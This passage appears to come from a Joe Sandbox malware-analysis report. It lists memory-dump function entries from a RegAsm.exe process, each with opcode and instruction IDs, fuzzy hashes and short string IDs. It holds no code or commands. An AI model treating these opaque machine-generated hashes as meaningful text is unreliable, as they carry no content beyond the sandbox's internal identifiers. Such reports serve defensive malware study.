                                                                                          • Instruction Fuzzy Hash: FE51E5716087818BD3268F2AC490372FBF2BF97301F18859DC0D68B796C679A896C765
                                                                                          Strings
                                                                                          • 00010203040506070809101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899, xrefs: 0042DEA0
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 00010203040506070809101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899
                                                                                          • API String ID: 0-2272463933
                                                                                          • Opcode ID: 7c979745e3df5926c2c29f341c4fdb53ce971d52e8417e0d3f50a33d64e6dac0
                                                                                          • Instruction ID: 869b3963eef22a0099427d75f201b8dab8a3013906bfc14c296fc1f0b668f466
                                                                                          • Opcode Fuzzy Hash: 7c979745e3df5926c2c29f341c4fdb53ce971d52e8417e0d3f50a33d64e6dac0
                                                                                          • Instruction Fuzzy Hash: 2F51FB33F1E9A147D725C93C6D502A6AA830FE7330B7E876AD5F24B3E1D5598802934E
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID: @
                                                                                          • API String ID: 2994545307-2766056989
                                                                                          • Opcode ID: 643aad024cb9179967f5516613061cfe0a9d1241da38854fae5d5b77afc3ef95
                                                                                          • Instruction ID: 838471edba8e1d20463cbb700c90be1a3c81a62bc7f5464742a77883af8fba41
                                                                                          • Opcode Fuzzy Hash: 643aad024cb9179967f5516613061cfe0a9d1241da38854fae5d5b77afc3ef95
                                                                                          • Instruction Fuzzy Hash: 364111729083109BD320CF55CC4576BBBE6EFD9318F198A2DEAC5173A1E779880487C6
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: @TB=
                                                                                          • API String ID: 0-1271029979
                                                                                          • Opcode ID: 767cd1403bab72470c3c18982e83873c1ee293b796285d735a82a41c4f0e5d26
                                                                                          • Instruction ID: 64caff7eb1075d012612922b4d77b52ab3a8afb6fb1af9fd4b49a276c7fa0c04
                                                                                          • Opcode Fuzzy Hash: 767cd1403bab72470c3c18982e83873c1ee293b796285d735a82a41c4f0e5d26
                                                                                          • Instruction Fuzzy Hash: FD41E3746087818BD322CF2AC490372FBF2BF96301F18859DC4D68B792C679E886CB55
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: %*+(
                                                                                          • API String ID: 0-3233224373
                                                                                          • Opcode ID: d8bd18897fa1106508e2349d975a00f0dfaf6b92f2cbe440f1e2f9d236d76544
                                                                                          • Instruction ID: e08f603c23ed2a4645cea7845729772066e32d6691cda9322c26d313a11b84a6
                                                                                          • Opcode Fuzzy Hash: d8bd18897fa1106508e2349d975a00f0dfaf6b92f2cbe440f1e2f9d236d76544
                                                                                          • Instruction Fuzzy Hash: 8B415931104700ABCB21DF14EC80AAFBBA6EB8D708F14B81EF89587251C739DC11DB5A
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID: ejkh
                                                                                          • API String ID: 2994545307-2912734685
                                                                                          • Opcode ID: 283de35f07730bf1a4c2d9390bd18af282233849b0fe8b32a2b1742cab14ccdc
                                                                                          • Instruction ID: 11b5030a369e267ce3dd6e03e8ae4c898547ff7b1fffffd621b9d0acb4c76236
                                                                                          • Opcode Fuzzy Hash: 283de35f07730bf1a4c2d9390bd18af282233849b0fe8b32a2b1742cab14ccdc
                                                                                          • Instruction Fuzzy Hash: 7E311531B026004BC729EF14C891577B7A3AFC1308728987ED8C61BB9ADB39AC05C788
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: "0!
                                                                                          • API String ID: 0-3102042130
                                                                                          • Opcode ID: f49ca4f16df8ec1c708e0f7e07f39219ebc50ff35885d1282b53893c28024b6c
                                                                                          • Instruction ID: 3e14af2809d53cb13463f87cdf6d9072eca18bc50d4bd8c615c1fffcfccb112e
                                                                                          • Opcode Fuzzy Hash: f49ca4f16df8ec1c708e0f7e07f39219ebc50ff35885d1282b53893c28024b6c
                                                                                          • Instruction Fuzzy Hash: 3D310170200B418FD329CF14D5A4A66BBF2BF56304B19D69DC0A68FB58D738E443CB89
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 2EB
                                                                                          • API String ID: 0-3446829840
                                                                                          • Opcode ID: c01ab6dfa76b673dea5ec2a02edf5145597fb5832d50a96ad297e4bf0d731468
                                                                                          • Instruction ID: e88266d54387fad51bda9e963874fc968feeb31a2e1f68e51bf2cdf66a95d8c0
                                                                                          • Opcode Fuzzy Hash: c01ab6dfa76b673dea5ec2a02edf5145597fb5832d50a96ad297e4bf0d731468
                                                                                          • Instruction Fuzzy Hash: 43A011A8C080008AE200AE02A802838B238220B28AF803038F808B3222F220E008820E
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: d5856749c19462b42cf21341150f4458666df5029b6d70cd2ed6e8f0e3340305
                                                                                          • Instruction ID: 9b9c7e47f4be79423ff0dd66dc4e3aa852f74fd7e6eae795312df2093ba748db
                                                                                          • Opcode Fuzzy Hash: d5856749c19462b42cf21341150f4458666df5029b6d70cd2ed6e8f0e3340305
                                                                                          • Instruction Fuzzy Hash: 8C52C331A087118BC725DF18E9802ABB3E2FFC4314F25893ED9D6A7385D738A955CB46
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: dd08c667db1392fa1bb7bff2945c9ef268149ace0e8fdb43e38acc18a06e1733
                                                                                          • Instruction ID: a790a7cf1772bef16112172d33ec4c47ac6c293db47a611039e8c5d481795d84
                                                                                          • Opcode Fuzzy Hash: dd08c667db1392fa1bb7bff2945c9ef268149ace0e8fdb43e38acc18a06e1733
                                                                                          • Instruction Fuzzy Hash: 0452F6315083459FCB15CF24C4906AABBE1FF89314F188A7EE8996B3C1D778D949CB89
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 48cc502ebb3b3b8c736f6e0032355fb927c2482e326923ec9b582e9b1b9a24db
                                                                                          • Instruction ID: 72ab7675db55eaec64f35a56cd92b28c78f76193891975a14b599bf55efbb0c5
                                                                                          • Opcode Fuzzy Hash: 48cc502ebb3b3b8c736f6e0032355fb927c2482e326923ec9b582e9b1b9a24db
                                                                                          • Instruction Fuzzy Hash: 4E52C0B0D0CB848FE7318B24C4847A7BBE1AB91314F14897ED5E656BC2C27DB885C75A
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 8c30790522ba3e05bdb6f46894e8324c8f29cec19a03e053d6396212aea2341d
                                                                                          • Instruction ID: 2e81389265ec39068e2efbc4d255af2832da4deeaf0ee8a39ccebae26c80aa73
                                                                                          • Opcode Fuzzy Hash: 8c30790522ba3e05bdb6f46894e8324c8f29cec19a03e053d6396212aea2341d
                                                                                          • Instruction Fuzzy Hash: 9F120336A082518FCB08CF28D89026FB7E1EF8E314F1A4A7ED99597391D734A905CB95
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: a07af96535d4d1c1f7639a6cd0f286e06ea166c16bf82795aef5774b8827cda8
                                                                                          • Instruction ID: 2689e7d5b28afa0227c09d3d0595c59a8dedc242c22121ea0291718ec3659d4c
                                                                                          • Opcode Fuzzy Hash: a07af96535d4d1c1f7639a6cd0f286e06ea166c16bf82795aef5774b8827cda8
                                                                                          • Instruction Fuzzy Hash: F64222B1614B108FC328CF29C690526BBF5BF85711B604A2ED697A7F90D73AF945CB08
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 4226730380cf64491f60214893894b26cb8fd663211530ac24a3e93c7b36bf6a
                                                                                          • Instruction ID: b46fda9016f420e2f22aa3b05543190ba727885e3d65cdc5888a09f2124faa48
                                                                                          • Opcode Fuzzy Hash: 4226730380cf64491f60214893894b26cb8fd663211530ac24a3e93c7b36bf6a
                                                                                          • Instruction Fuzzy Hash: E0023E72A04B404BD714DF3CC885396BBE2AB95324F184A3ED5EA873D2D67DE486C706
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 64663016c3f7e1e5b77ef95a5383f35fe7339210271c535c41e197876c27cae6
                                                                                          • Instruction ID: 04afc72fcd6871469f05f3058b6f6bdd18e2572d4aba700baa16428f3a5bfb4c
                                                                                          • Opcode Fuzzy Hash: 64663016c3f7e1e5b77ef95a5383f35fe7339210271c535c41e197876c27cae6
                                                                                          • Instruction Fuzzy Hash: B2C1EFB49047408FD720DF29C982653BFB1FF56314B1586ADD4C60FB91E339A88ACB96
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: eab858f7205526bd9e1bfd5a13f3b85329fb1f67572e2d255be10cd38678a965
                                                                                          • Instruction ID: 3a5b8b6bb00412cac19af0cd667898fa1446fa1c3a6882d826fcaeb958e70237
                                                                                          • Opcode Fuzzy Hash: eab858f7205526bd9e1bfd5a13f3b85329fb1f67572e2d255be10cd38678a965
                                                                                          • Instruction Fuzzy Hash: 7EE18C751087418FC724DF29C880B2BBBE1EF99300F44882EF4D697792E679E954CB96
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 660db6f06cccd5cf8d0dbc420b92d3e135b9e4a937325ecf1710bc9889b50eb0
                                                                                          • Instruction ID: 6ee2157e97612939f3cc76a0a82759336f11cdd4ffa5b49510869822059c27d6
                                                                                          • Opcode Fuzzy Hash: 660db6f06cccd5cf8d0dbc420b92d3e135b9e4a937325ecf1710bc9889b50eb0
                                                                                          • Instruction Fuzzy Hash: E0B15A72A083100BE314DE29CC8176BBBD5DBC9314F08593EF995C3381EAB8DD05879A
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 4933ac366f03470c66bda3ad725c908145eaf8b141d5f550203df71f083531d4
                                                                                          • Instruction ID: 5d7f7219289a9caf438100a5be29394ea88bbd45f3ee3a3e3815a4a429e43cde
                                                                                          • Opcode Fuzzy Hash: 4933ac366f03470c66bda3ad725c908145eaf8b141d5f550203df71f083531d4
                                                                                          • Instruction Fuzzy Hash: 9AC12B72E087D18FCB11C6BCCD8139E7F629B9B224F1D829AD5A16F3C6C1694807C766
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: ddc1399ec9bfc5f34465acfc20a0891794777ac3100d50941291acc1327ac989
                                                                                          • Instruction ID: c1e2ffefc49ce53675450e8e32cdf86671016c2fbc064f9601c3987bcbaf8375
                                                                                          • Opcode Fuzzy Hash: ddc1399ec9bfc5f34465acfc20a0891794777ac3100d50941291acc1327ac989
                                                                                          • Instruction Fuzzy Hash: 44B1F370704B518FE725CF39C4917A7BBE1AF52304F58896EC0EB8B782D679A4098B15
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 70010bc26ddd2a2ecdc843febe5bb7e45321c51722ffbd6b5b1316e6dab102e4
                                                                                          • Instruction ID: a7b6cc70ddf1cbb02d491c28e98fb5aa6dd838b71bce99a9f2467179aad81c6a
                                                                                          • Opcode Fuzzy Hash: 70010bc26ddd2a2ecdc843febe5bb7e45321c51722ffbd6b5b1316e6dab102e4
                                                                                          • Instruction Fuzzy Hash: E9B1F470704B908FE725CF39C4917A7BBE1AF52304F58896EC0EB8B782D679A409CB15
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 865be10f5e5b8e416bcb864b88d86890ff1d16bca93cac08a226b84d2c992524
                                                                                          • Instruction ID: 855f79fc2a0bc0fe0e8afe43f47d4bb71f364d563eb6d90c50a8bb6562051d63
                                                                                          • Opcode Fuzzy Hash: 865be10f5e5b8e416bcb864b88d86890ff1d16bca93cac08a226b84d2c992524
                                                                                          • Instruction Fuzzy Hash: 65B1F470704B508FE725CF39C4917A7BBE1AF52304F58896EC0EB8B782D67DA4098B15
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID:
                                                                                          • API String ID: 2994545307-0
                                                                                          • Opcode ID: a3a2c0889b4a069eac07530809c8e4b4c5ecde2e4aeb34b2b7ffabef19b128b7
                                                                                          • Instruction ID: 5e4e1a03b1f9e66379612c72a1ec20b173c7faaf42b0a12b24a6ae32266cc9a4
                                                                                          • Opcode Fuzzy Hash: a3a2c0889b4a069eac07530809c8e4b4c5ecde2e4aeb34b2b7ffabef19b128b7
                                                                                          • Instruction Fuzzy Hash: C9A1E331A083118BC724DF28C8C162BB7E2EFC9714F19952DE9C6A7351DB79AC51C786
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID:
                                                                                          • API String ID: 2994545307-0
                                                                                          • Opcode ID: c26bd0b406ec0ad635e3c4b45a77163388a1b757b18d12edc31244ff72d0964a
                                                                                          • Instruction ID: 10404c7dfef822de7b1020b8dc228c5d3042818e9b2a32d33877fa8b590e0ec5
                                                                                          • Opcode Fuzzy Hash: c26bd0b406ec0ad635e3c4b45a77163388a1b757b18d12edc31244ff72d0964a
                                                                                          • Instruction Fuzzy Hash: 5A9103356043028BC724DF18C891A3FB7E2EFCD714F15952EE9869B351EB38AC118B85
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 03a52a1ad74051845515929265544f186aad33e8d97b6de79312a11ff83a37ec
                                                                                          • Instruction ID: fd6c2b462fc64d35ffbc1d170f6f183477a24f54d1d1efa4ba11a0009e4e830f
                                                                                          • Opcode Fuzzy Hash: 03a52a1ad74051845515929265544f186aad33e8d97b6de79312a11ff83a37ec
                                                                                          • Instruction Fuzzy Hash: 91C15AB2A087518FC330CF28C856BABB7E0AF85318F09493DD5DAD6342D778A555CB46
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: a8282806200de375fff037e48920e1fd944b6580befc94a5fb122645b8365230
                                                                                          • Instruction ID: 1a6d0a23743ec26c95684495a8f1035cf1c2d1acb992bd88eeac5e3f48a3ffec
                                                                                          • Opcode Fuzzy Hash: a8282806200de375fff037e48920e1fd944b6580befc94a5fb122645b8365230
                                                                                          • Instruction Fuzzy Hash: 3BA1C770605B508EE725CF35C4917A3BBE1AF52304F54895ED0EB8B782D678A409CB65
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: faf9876edd2ed3d0eb6dbf5db98b01f759f16913e76dbe65ca7f3da26e5c507e
                                                                                          • Instruction ID: 1711ec92b126bdb5ecec348a11a8854d3a67b007717b6f72a2c5c0cfa47d1efe
                                                                                          • Opcode Fuzzy Hash: faf9876edd2ed3d0eb6dbf5db98b01f759f16913e76dbe65ca7f3da26e5c507e
                                                                                          • Instruction Fuzzy Hash: C4A19971704B418BE7218B35D881763BBE2EFA2314F598A2ED0EB477D2C738A805CB45
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: ffdc5a85d22a2472c3095955b835e0aa3f2a76c3a4846f672050c52fda311b61
                                                                                          • Instruction ID: 85fb01f5858c44322bc99737c64197bb4e73da660ad129e5441660d3e3fd52c8
                                                                                          • Opcode Fuzzy Hash: ffdc5a85d22a2472c3095955b835e0aa3f2a76c3a4846f672050c52fda311b61
                                                                                          • Instruction Fuzzy Hash: 7CA1563A748611CFCB049F28E8E026AB3E1EBCE315F0E86BDC5C597755D2389856CB85
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID:
                                                                                          • API String ID: 2994545307-0
                                                                                          • Opcode ID: 236d88e1505bedcc90e359d61e48ebf9da4aee982a8ada30a69ed0228cc9c13c
                                                                                          • Instruction ID: 862fd93503142289749ce71677033ae7526331cc912a265556ec69f2e9d09d67
                                                                                          • Opcode Fuzzy Hash: 236d88e1505bedcc90e359d61e48ebf9da4aee982a8ada30a69ed0228cc9c13c
                                                                                          • Instruction Fuzzy Hash: 2D810471608341AFE724EB24CC41BBFB7D5EF8A314F14592EE98983392EA749C40C75A
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 37ce9789a5d70e1c34df3f1d163e6adec9cad68b50e311b9f190c6963ee573b9
                                                                                          • Instruction ID: 7267e1a54e9a94c40c4d61fa6a091e1d8637ad7e469afbbdd3ac74cd06a0e51c
                                                                                          • Opcode Fuzzy Hash: 37ce9789a5d70e1c34df3f1d163e6adec9cad68b50e311b9f190c6963ee573b9
                                                                                          • Instruction Fuzzy Hash: ACA13872B04B804FD3158B38D89536BBFE2AB96308F5CC97DC4DB87746D639A4058716
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: b0c57005a62a507d8e6fb65c4beee5771d2f724920adbcece6ab24b0124d563a
                                                                                          • Instruction ID: a15b227afacf316e019d539d0ac91421acc1051c8401e8426e897f14c4fe0d2e
                                                                                          • Opcode Fuzzy Hash: b0c57005a62a507d8e6fb65c4beee5771d2f724920adbcece6ab24b0124d563a
                                                                                          • Instruction Fuzzy Hash: B5A126B2B04B804BD3198A38D89136BBFE2ABD5308F5CC97DC5DB87346E639A445C746
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 9af9c4643f8ce71516d6888dae12218d0540f0aa019acd8ff8abfd066ecbe9a3
                                                                                          • Instruction ID: 7bc57cb332118c4f52d6302f8f4d4b66f4e26c6ff24aa2ce5191b2fd42b511dc
                                                                                          • Opcode Fuzzy Hash: 9af9c4643f8ce71516d6888dae12218d0540f0aa019acd8ff8abfd066ecbe9a3
                                                                                          • Instruction Fuzzy Hash: BF71383A749652CFC7009F3CE8E025AB3A1EBCB315F0E86B9C5C597756C2389856DB81
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: a78249001226d337e5d93963206479f381cfebe06fcb11470e1e29fddac355ce
                                                                                          • Instruction ID: 339020c2bdd1b364ff79022d7c26bfc0b3113fa0c89456fe7f49b6c47cf04311
                                                                                          • Opcode Fuzzy Hash: a78249001226d337e5d93963206479f381cfebe06fcb11470e1e29fddac355ce
                                                                                          • Instruction Fuzzy Hash: 31612431B14721CBDB20CF68C4812ABB7F1EB1A350F58496EC88697382D37CAD05D7A9
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 5587628e9af5e75d2a7c58451ddbce61554dce936d5bae19e299c636e88e16e3
                                                                                          • Instruction ID: 669d7e76c4e98e4c7e3dd9e75b154535615c1ed6e9a49740d154c06d084f4795
                                                                                          • Opcode Fuzzy Hash: 5587628e9af5e75d2a7c58451ddbce61554dce936d5bae19e299c636e88e16e3
                                                                                          • Instruction Fuzzy Hash: 45515D33F1A9B147C7288D3D6C112AA6A575F96330B6D837BE9B1DB3D1C55C8C028399
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: de64cd69f6bd35c4ea8dd8e0f1d3215bd08a222fe6a2d873d8bf2dd623ebd179
                                                                                          • Instruction ID: e6ee1f9f07d51974ce93db15d9acf5212c336a13d1ae42cc0d814cbdbf8f79a7
                                                                                          • Opcode Fuzzy Hash: de64cd69f6bd35c4ea8dd8e0f1d3215bd08a222fe6a2d873d8bf2dd623ebd179
                                                                                          • Instruction Fuzzy Hash: 65511A72A14B254BD719CE2CEC5023BB2D2ABC8301F99863DDC568B385EA38ED11C795
                                                                                          Memory Dump Source
